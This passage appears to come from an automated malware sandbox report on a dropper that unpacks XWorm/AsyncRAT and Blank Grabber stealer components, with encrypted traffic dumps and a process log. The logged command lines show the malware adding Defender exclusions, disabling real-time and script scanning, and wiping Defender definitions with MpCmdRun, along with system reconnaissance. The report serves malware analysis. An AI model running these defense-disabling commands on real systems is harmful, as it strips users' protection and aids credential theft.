                                                                    2024-08-05 12:32:36 UTC16384OUTData Raw: 3d 9f 74 af 87 3b b5 a1 96 b8 f4 07 bc e4 3f f1 39 b1 1d 19 50 bb ee 9f 29 cd 58 62 fd a7 a5 68 a2 db b2 7a a0 4a 2e 5b e8 de f1 33 f7 3e c8 8e b5 c0 d2 1a fe 89 44 b7 38 f3 d2 01 09 8f cd 34 12 5f bb 38 e2 d1 1d a2 74 68 f9 cc 94 2c 96 8a 30 29 25 58 70 22 df cd c5 ad 71 29 f8 95 52 2a b5 4a d0 57 81 70 c0 f8 a0 8f 83 2b 2a 26 1d bb 06 c4 e1 cc 6f ed 8f 08 3d 04 a5 f4 0d 67 d6 a1 a7 ad f1 29 34 37 1b 3e f6 38 47 9a 63 e1 43 90 ec 27 ba 8b 80 21 6b 53 a3 e5 1b 41 f3 a3 7f ff 20 0e 8e da 1e 0a 34 12 df c5 87 08 3c 35 36 3c 76 7b d8 35 1e b4 da bb 6f 3d 51 57 66 54 f9 ee d0 24 a6 13 e7 b9 b2 b1 9b f1 59 93 63 c6 f6 49 b6 e5 62 9f af 87 30 46 3b a1 1f db c0 83 b6 3a 73 01 0d b8 69 0a 05 20 70 77 4c d6 b5 72 51 4c fa ec 6e 88 7e ec 9e f2 0e a9 90 1d 11 98 e8
                                                                    Data Ascii: =t;?9P)XbhzJ.[3>D84_8th,0)%Xp"q)R*JWp+*&o=g)47>8GcC'!kSA 4<56<v{5o=QWfT$YcIb0F;:si pwLrQLn~
                                                                    2024-08-05 12:32:36 UTC16384OUTData Raw: ad 81 ca 80 9c fe 3a 51 05 6c bd f0 18 94 7c 2c d1 fc 7a 53 22 6a 12 43 d1 cc 85 f3 da ac fb bd 55 17 54 f1 76 eb 3e d8 7a 2d 98 bc 7b ba 84 8c b9 bd 9e 0f b0 66 36 4c ef 7e 0c f2 99 a6 c7 62 8a 8c 70 2b db a0 4b 32 c5 b8 83 7f ac 72 d9 65 da 59 6e 0e 95 95 1a 95 8a 66 cc 4d 2b 2d 2c c1 b8 1f 6a 40 4f c1 b8 da 0e 72 6a 92 d5 3f 94 f8 1f 84 86 46 34 fb 27 51 a2 79 ae 5f de 56 0b 5f a1 0e 64 ae 45 40 05 fb 1e 4d 65 2d e6 92 f1 a0 6e 90 81 ac 30 e8 9f 81 56 cf e3 42 42 80 b3 12 65 df 53 f2 f7 cb 79 69 8f 1e 8d 5f 56 05 06 5f e1 be fd 4c eb b2 c2 ae f4 74 71 7e ab a8 aa e8 e3 e0 2e 21 fc 28 8e e6 46 24 4a 04 51 db 04 cd 5a a0 8f 70 bd 24 54 51 81 50 92 be 02 3c 77 27 b8 98 a2 3e 0e 43 fb 0b 48 46 a2 44 71 fa 55 2a cd 3f 0f 8c 2d 70 02 59 80 b1 5e 69 71 13 79
                                                                    Data Ascii: :Ql|,zS"jCUTv>z-{f6L~bp+K2reYnfM+-,j@Orj?F4'Qy_V_dE@Me-n0VBBeSyi_V_Ltq~.!(F$JQZp$TQP<w'>CHFDqU*?-pY^iqy
                                                                    2024-08-05 12:32:36 UTC16384OUTData Raw: 1b 27 24 c1 45 c8 af 54 a6 43 9e f4 d8 47 cd 80 66 c7 d2 0a e8 3e 8a b7 fc f2 5d 43 38 cd 14 ff 4d ad 8b b0 6f db d9 07 47 b7 1e ef ed 5e 10 f0 31 4f 9c 34 b4 62 e1 61 95 99 9d 70 ae a7 53 ce 69 42 62 d0 58 9a f8 92 24 94 62 1c 26 98 9f c7 c7 ec a8 4b 0d a9 f4 f1 ce c9 fa d0 33 c9 6d df a3 a9 8d fc 39 9f 7d 50 61 d5 e9 12 6c 3f 78 cc 2e 7d 86 3b 0e be fc 90 df 8c f2 68 50 4e cb 85 80 fd 63 a5 15 97 62 9d a3 0d 8c 1d a4 57 32 62 99 25 d0 8b 18 b1 b4 13 74 6f 5a c9 11 73 92 8d 9e 63 34 51 30 a5 b4 71 d1 c2 0d 48 84 b7 91 73 98 05 46 43 2e f0 63 78 6d 75 fa 95 f3 f6 f5 81 bf b2 80 1e 69 43 6d 12 c3 c3 e2 6d 5c b6 bf fa 13 c1 68 4e 53 29 1d 46 eb ca a5 67 48 77 d1 df f6 84 fa d2 80 78 c8 d0 1a 38 5c a6 16 1d 43 0b 40 89 09 4b 1b 38 54 54 2d 3a e1 8d 84 c2 c7
                                                                    Data Ascii: '$ETCGf>]C8MoG^1O4bapSiBbX$b&K3m9}Pal?x.};hPNcbW2b%toZsc4Q0qHsFC.cxmuiCmm\hNS)FgHwx8\C@K8TT-:
                                                                    2024-08-05 12:32:36 UTC16384OUTData Raw: 5b 9b 3c 0f 3c 9a 13 99 ae 32 e0 70 1a d5 43 02 4a 24 3d f2 17 50 69 19 1b d5 1d 65 f6 cc cc b0 46 9a b6 99 ad 9e 13 13 fb ca 91 e9 5c 93 dd 96 a5 00 95 de a1 32 ee 34 24 ea bd a2 0d 79 f2 f9 1b 46 af 98 72 2f 9f b4 af 81 3f bb 8f d3 7d 44 af 66 c7 0d 39 ef 42 3e 4d b4 8b cf cf a6 34 c1 22 23 a7 66 bd cc ee cf 8b 5a 83 19 a8 cc f1 d3 08 5d 09 70 0b dd 66 b2 4d a5 e8 04 c3 44 e1 fd c2 23 ac 80 50 18 71 bc d8 1b b6 80 b1 a1 e9 77 c2 95 4b 18 e1 c3 69 55 09 27 a2 7c 7f f1 e1 ba 78 3a b5 a4 22 76 f8 56 62 f4 1c 9b 2e b6 00 b2 54 d5 c9 98 da 9f 4e 57 52 8b c0 d4 b7 f2 12 14 70 ed e0 4a 2b 34 bd 51 83 fc ab 92 2d 97 ad a4 0f bb 39 b9 ec ff bb 7f e1 1b 1b 33 59 dd 71 6d f6 41 49 0a ed d8 62 ee b8 88 98 e2 cd cd 4f 1d 2f 57 e5 71 f6 cf 11 2b f9 2c 70 e1 10 53 03
                                                                    Data Ascii: [<<2pCJ$=PieF\24$yFr/?}Df9B>M4"#fZ]pfMD#PqwKiU'|x:"vVb.TNWRpJ+4Q-93YqmAIbO/Wq+,pS
                                                                    2024-08-05 12:32:36 UTC16384OUTData Raw: a5 e4 d4 7f ac 29 af ae f3 cb ce fb 64 62 91 9c a7 26 78 b0 a4 ac c1 ce ae b7 3a 52 85 f3 20 3e a2 65 52 c3 48 7c 53 72 2c e9 c8 58 9b 37 f5 7a 6e 1d 73 03 fb a0 42 1e 9b 71 f5 34 ea 4c b3 f7 e7 78 37 4c 8a ac 1b 31 bb 06 64 b8 37 88 22 fb ef 44 7d a6 ae ce 6a c9 af e9 d2 99 2f 89 12 d4 d3 a9 73 1d b0 40 4d 0e ea a2 f0 73 86 3c 2b 0c fd 91 72 0e 98 57 a6 5b e9 a0 d9 55 f1 1b 66 13 dd 1d 15 8e 47 61 71 77 71 6f 85 7f 27 d4 a8 3c 6e fb d1 71 dd fc 65 c0 35 f5 31 98 f6 fc d6 fd 33 82 cd 84 ff 96 1e eb bf 6e 75 79 1d e1 a2 83 bc 9f 38 82 a7 a1 b4 0d 8a a7 bf 65 01 4c 08 20 92 e6 bc a8 e6 05 66 b3 8d 54 c7 20 de ee 55 ce 09 0a ee a7 e6 57 61 ba 0d 31 6e 4b ee b9 80 be c5 5d 9a f7 45 62 c9 4f 70 91 da 08 56 1a 3b 05 2f 14 89 be 42 70 fb b9 4b 3a d6 b7 bf 3d 43
                                                                    Data Ascii: )db&x:R >eRH|Sr,X7znsBq4Lx7L1d7"D}j/s@Ms<+rW[UfGaqwqo'<nqe513nuy8eL fT UWa1nK]EbOpV;/BpK:=C
                                                                    2024-08-05 12:32:36 UTC16384OUTData Raw: 96 4b ae 64 b5 f5 3e b6 02 00 b9 ac 32 d5 4d 78 12 b4 52 55 7c 23 9e c2 2a 12 1a b2 93 4f 32 f8 43 81 ac fe b2 ca 07 b1 3e 45 32 8c 27 72 32 47 e3 6c f6 cb e8 74 03 5a 4c cb f8 d1 dc df bc 88 d9 3b c7 fe d9 03 ba e4 89 5f 58 71 d2 5c 2d f4 0e 32 a5 a4 a6 47 fd 2e 73 90 e7 09 df 5d 4b 5c 60 49 95 44 f7 d1 25 83 57 9f bc de a6 71 be 3f 8e 04 5b 9d 6d 3a 4b b5 4d dd c3 d5 26 f3 be 60 a7 e7 37 04 a0 3f f3 ef 00 5b 85 c7 f2 c0 a9 76 54 4d 2c 1d 93 d8 d9 f7 9c a4 e0 bc c6 ea 0b 37 2a 0c 91 75 b4 79 e8 c0 07 18 b6 e5 06 5e 11 6b 7b 42 5b 7d e5 61 6e 84 c1 61 30 e8 a4 4f 50 00 e6 ae 94 fb 01 35 d8 7d c1 67 d0 ac 24 21 bb 45 42 b9 76 cd 51 f8 be e8 b4 c3 4a db 64 6a 04 38 e6 d5 9a ff a0 da dd ab 36 d9 b3 00 86 20 92 e1 36 40 dc bc c0 cf 49 e3 73 dd e9 36 81 3f 0e
                                                                    Data Ascii: Kd>2MxRU|#*O2C>E2'r2GltZL;_Xq\-2G.s]K\`ID%Wq?[m:KM&`7?[vTM,7*uy^k{B[}ana0OP5}g$!EBvQJdj86 6@Is6?
                                                                    2024-08-05 12:32:37 UTC1124INHTTP/1.1 404 Not Found
                                                                    Date: Mon, 05 Aug 2024 12:32:36 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 45
                                                                    Connection: close
                                                                    set-cookie: __dcfduid=cc102cbe532611efb691ee972d83bda8; Expires=Sat, 04-Aug-2029 12:32:36 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                    strict-transport-security: max-age=31536000; includeSubDomains
                                                                    x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                    x-ratelimit-limit: 5
                                                                    x-ratelimit-remaining: 4
                                                                    x-ratelimit-reset: 1722861158
                                                                    x-ratelimit-reset-after: 1
                                                                    via: 1.1 google
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7l2Y0cbTqAvp9FnXw%2Fn5Qe08%2BJ3iJfctX0ftX9zN%2F9FZo7aOhzp6m9g5eW61JyzYYhpuEFYJAL9S1R5djAKmMIZnsprSWC94yVsG0NbVHdCVzs%2B9PHVF6rcm4XPJFe9i"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Set-Cookie: __sdcfduid=cc102cbe532611efb691ee972d83bda82e7f3f39958e45967b3cc47046cb9666bba02bd08ddaaa28342cb9067cb06e2d; Expires=Sat, 04-Aug-2029 12:32:36 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax


                                                                    Click to jump to process

                                                                    Click to jump to process

                                                                    Click to dive into process behavior distribution

                                                                    Click to jump to process

                                                                    Target ID:0
                                                                    Start time:08:32:01
                                                                    Start date:05/08/2024
                                                                    Path:C:\Users\user\Desktop\Vjy8d2EoqK.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\Vjy8d2EoqK.exe"
                                                                    Imagebase:0x400000
                                                                    File size:8'422'912 bytes
                                                                    MD5 hash:A0936899FBF31493BBE5E34DC18A9341
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000003.1696194497.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000003.1696194497.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.1682604318.0000000000408000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.1682604318.0000000000408000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:1
                                                                    Start time:08:32:02
                                                                    Start date:05/08/2024
                                                                    Path:C:\Users\user\AppData\Local\Temp\Built.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\Built.exe"
                                                                    Imagebase:0x7ff76d5c0000
                                                                    File size:7'170'862 bytes
                                                                    MD5 hash:EC729E4911261337E4CA4E9FC77F942B
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.1694117012.0000021AFD7E2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.1694117012.0000021AFD7E4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                    Antivirus matches:
                                                                    • Detection: 39%, ReversingLabs
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:2
                                                                    Start time:08:32:03
                                                                    Start date:05/08/2024
                                                                    Path:C:\Users\user\AppData\Local\Temp\svchosts.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\svchosts.exe"
                                                                    Imagebase:0x290000
                                                                    File size:1'164'420 bytes
                                                                    MD5 hash:91F72031C3AD088797D77357FA39DB39
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Antivirus matches:
                                                                    • Detection: 79%, ReversingLabs
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:3
                                                                    Start time:08:32:03
                                                                    Start date:05/08/2024
                                                                    Path:C:\Users\user\AppData\Local\Temp\Built.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\Built.exe"
                                                                    Imagebase:0x7ff76d5c0000
                                                                    File size:7'170'862 bytes
                                                                    MD5 hash:EC729E4911261337E4CA4E9FC77F942B
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000003.00000003.2039099236.000001D5E543D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000003.00000002.2044988852.000001D5E5020000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2044988852.000001D5E5020000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000003.00000003.2029505952.000001D5E6183000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000003.00000003.2035836310.000001D5E542F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000003.00000003.1722583817.000001D5E51D7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000003.00000003.2038832287.000001D5E5438000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000003.00000002.2050287577.000001D5E543E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000003.00000003.2032955728.000001D5E542F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:4
                                                                    Start time:08:32:03
                                                                    Start date:05/08/2024
                                                                    Path:C:\Users\user\AppData\Local\Temp\S l r .exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\S l r .exe"
                                                                    Imagebase:0x400000
                                                                    File size:77'824 bytes
                                                                    MD5 hash:D69B290766342861CDE3B24BA1ECD0C6
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000004.00000000.1696061537.0000000000409000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000004.00000000.1696061537.0000000000409000.00000002.00000001.01000000.0000000C.sdmp, Author: ditekSHen
                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000004.00000003.1709553123.000000000055D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000004.00000003.1709553123.000000000055D000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\S l r .exe, Author: Joe Security
                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\S l r .exe, Author: ditekSHen
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Avira
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    • Detection: 96%, ReversingLabs
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:5
                                                                    Start time:08:32:04
                                                                    Start date:05/08/2024
                                                                    Path:C:\Windows\SysWOW64\wscript.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Brokercrt\aIVfHknoFLGNu6gLK6xZar0.vbe"
                                                                    Imagebase:0x860000
                                                                    File size:147'456 bytes
                                                                    MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    Target ID:6
                                                                    Start time:08:32:04
                                                                    Start date:05/08/2024
                                                                    Path:C:\Users\user\AppData\Local\Temp\XClient.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\XClient.exe"
                                                                    Imagebase:0xd70000
                                                                    File size:54'784 bytes
                                                                    MD5 hash:BF19D4A22F47EEA6DD1DB1C98A5AAC07
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000006.00000000.1709097022.0000000000D72000.00000002.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000006.00000000.1709097022.0000000000D72000.00000002.00000001.01000000.0000000F.sdmp, Author: ditekSHen
                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\XClient.exe, Author: Joe Security
                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\XClient.exe, Author: ditekSHen
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Avira
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    • Detection: 92%, ReversingLabs
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:7
                                                                    Start time:08:32:04
                                                                    Start date:05/08/2024
                                                                    Path:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe"
                                                                    Imagebase:0x4f0000
                                                                    File size:13'312 bytes
                                                                    MD5 hash:6557BD5240397F026E675AFB78544A26
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Antivirus matches:
                                                                    • Detection: 33%, ReversingLabs
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:8
                                                                    Start time:08:32:04
                                                                    Start date:05/08/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:9
                                                                    Start time:08:32:06
                                                                    Start date:05/08/2024
                                                                    Path:C:\Windows\System32\cmd.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'"
                                                                    Imagebase:0x7ff72aad0000
                                                                    File size:289'792 bytes
                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:10
                                                                    Start time:08:32:06
                                                                    Start date:05/08/2024
                                                                    Path:C:\Windows\System32\cmd.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                                    Imagebase:0x7ff72aad0000
                                                                    File size:289'792 bytes
                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:11
                                                                    Start time:08:32:06
                                                                    Start date:05/08/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:12
                                                                    Start time:08:32:06
                                                                    Start date:05/08/2024
                                                                    Path:C:\Windows\System32\cmd.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                    Imagebase:0x7ff72aad0000
                                                                    File size:289'792 bytes
                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:13
                                                                    Start time:08:32:06
                                                                    Start date:05/08/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:14
                                                                    Start time:08:32:06
                                                                    Start date:05/08/2024
                                                                    Path:C:\Windows\System32\cmd.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                    Imagebase:0x7ff72aad0000
                                                                    File size:289'792 bytes
                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:15
                                                                    Start time:08:32:06
                                                                    Start date:05/08/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:16
                                                                    Start time:08:32:06
                                                                    Start date:05/08/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:17
                                                                    Start time:08:32:06
                                                                    Start date:05/08/2024
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                    Imagebase:0x7ff788560000
                                                                    File size:452'608 bytes
                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:18
                                                                    Start time:08:32:06
                                                                    Start date:05/08/2024
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'
                                                                    Imagebase:0x7ff788560000
                                                                    File size:452'608 bytes
                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:19
                                                                    Start time:08:32:06
                                                                    Start date:05/08/2024
                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:tasklist /FO LIST
                                                                    Imagebase:0x7ff74ce90000
                                                                    File size:106'496 bytes
                                                                    MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:20
                                                                    Start time:08:32:06
                                                                    Start date:05/08/2024
                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:wmic csproduct get uuid
                                                                    Imagebase:0x7ff740ad0000
                                                                    File size:576'000 bytes
                                                                    MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:21
                                                                    Start time:08:32:08
                                                                    Start date:05/08/2024
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe'
                                                                    Imagebase:0x7ff788560000
                                                                    File size:452'608 bytes
                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:22
                                                                    Start time:08:32:08
                                                                    Start date:05/08/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:23
                                                                    Start time:08:32:09
                                                                    Start date:05/08/2024
                                                                    Path:C:\Windows\System32\cmd.exe
                                                                    Wow64 process (32bit):false
